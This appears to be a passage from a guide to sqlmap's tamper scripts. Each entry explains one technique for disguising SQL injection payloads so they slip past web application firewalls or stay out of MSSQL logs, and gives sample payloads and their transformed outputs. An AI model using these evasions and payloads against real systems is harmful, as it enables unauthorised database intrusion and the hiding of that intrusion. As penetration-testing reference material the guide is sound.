'1 AND 9227=9227-- sp_password'

Description from the original file:
"""
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

Requirement:
    * MSSQL

Notes:
    * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
    * Reference: http://websec.ca/kb/sql_injection

>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
"""

chardoubleencode.py

Effect: URL-encodes all characters twice (already-encoded characters are not processed)

For example, the character A URL-encodes once to %41; the percent sign is then URL-encoded again (the 4 and 1 are not encoded), giving %2541
% URL-encodes once to %25

Example (what actually happens): this script does not encode %20 at all!
Original statement: SELECT FIELD FROM%20TABLE
First restore it to: SELECT FIELD FROM TABLE
URL-encode once, then replace every percent sign % with %25

Worked instance:
SELECT FIELD FROM%20TABLE (a plain URL-encoding of this %20 would give %25%32%30; this script actually does not re-encode already encoded sequences)
URL-encoded once (the string %20 is unchanged): %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45
Replace every percent sign with %25 to get the result: %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

Description from the original file:
"""
Double url-encodes all characters in a given payload (not processing
already encoded)

Notes:
    * Useful to bypass some weak web application firewalls that do not
      double url-decode the request before processing it through their
      ruleset

>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
"""

unionalltounion.py

Effect: replaces UNION ALL with UNION

Description from the original file:
"""
Replaces UNION ALL SELECT with UNION SELECT

>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
"""

charencode.py

Effect: URL-encodes all characters in the payload once (already-encoded characters are not processed)
Example:
'SELECT FIELD FROM%20TABLE'
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

Description from the original file:

"""
Url-encodes all characters in a given payload (not processing already
encoded)

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass very weak web application firewalls that do not
      url-decode the request before processing it through their ruleset
    * The web server will anyway pass the url-decoded version behind,
      hence it should work against any DBMS

>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
"""

randomcase.py

Effect: replaces the letters of each (easily blocked) keyword with random upper/lower case

Description from the original file:

"""
Replaces each keyword character with random case value

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass very weak and bespoke web application firewalls
      that has poorly written permissive regular expressions
    * This tamper script should work against all (?) databases

>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'INseRt'
"""

unmagicquotes.py

Un-magic-quotes [wide-character bypass of GPC addslashes]
Effect: replaces the single quote ' with %bf%27 and appends a generic comment -- at the end so that the statement still runs.
Description from the original file:

"""
Replaces quote character (') with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)

Notes:
    * Useful for bypassing magic_quotes/addslashes feature

Reference:
    * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

>>> tamper("1' AND 1=1")
'1%bf%27-- '
"""

randomcomments.py

Effect: randomly inserts /**/ into SQL keywords (between their letters)

Description from the original file:
"""
Add random comments to SQL keywords

>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'I/**/N/**/SERT'
"""

charunicodeencode.py

Effect: Unicode-encodes the string

Case 1:
http://www.wooyun.org/bugs/wooyun-2010-074261

Description from the original file:
"""
Unicode-url-encodes non-encoded characters in a given payload (not
processing already encoded)

Requirement:
    * ASP
    * ASP.NET

Tested against:
    * Microsoft SQL Server 2000
    * Microsoft SQL Server 2005
    * MySQL 5.1.56
    * PostgreSQL 9.0.3

Notes:
    * Useful to bypass weak web application firewalls that do not
      unicode url-decode the request before processing it through their
      ruleset

>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
"""

securesphere.py

Effect: appends a specially crafted string

Description from the original file:
"""
Appends special crafted string

Notes:
    * Useful for bypassing Imperva SecureSphere WAF
    * Reference: http://seclists.org/fulldisclosure/2011/May/163

>>> tamper('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"
"""

versionedmorekeywords.py

Effect: MySQL versioned-comment bypass, e.g. /*!UNION*/
[mysql] only

Description from the original file:
"""
Encloses each keyword with versioned MySQL comment

Requirement:
    * MySQL >= 5.1.13

Tested against:
    * MySQL 5.1.56, 5.5.11

Notes:
    * Useful to bypass several web application firewalls when the
      back-end database management system is MySQL

>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
"""

space2comment.py

Effect: replaces each space with /**/

Description from the original file:
"""
Replaces space character (' ') with comments '/**/'

Tested against:
    * Microsoft SQL Server 2005
    * MySQL 4, 5.0 and 5.5
    * Oracle 10g
    * PostgreSQL 8.3, 8.4, 9.0

Notes:
    * Useful to bypass weak and bespoke web application firewalls

>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
"""

Case 1: http://www.wooyun.org/bugs/wooyun-2010-046496

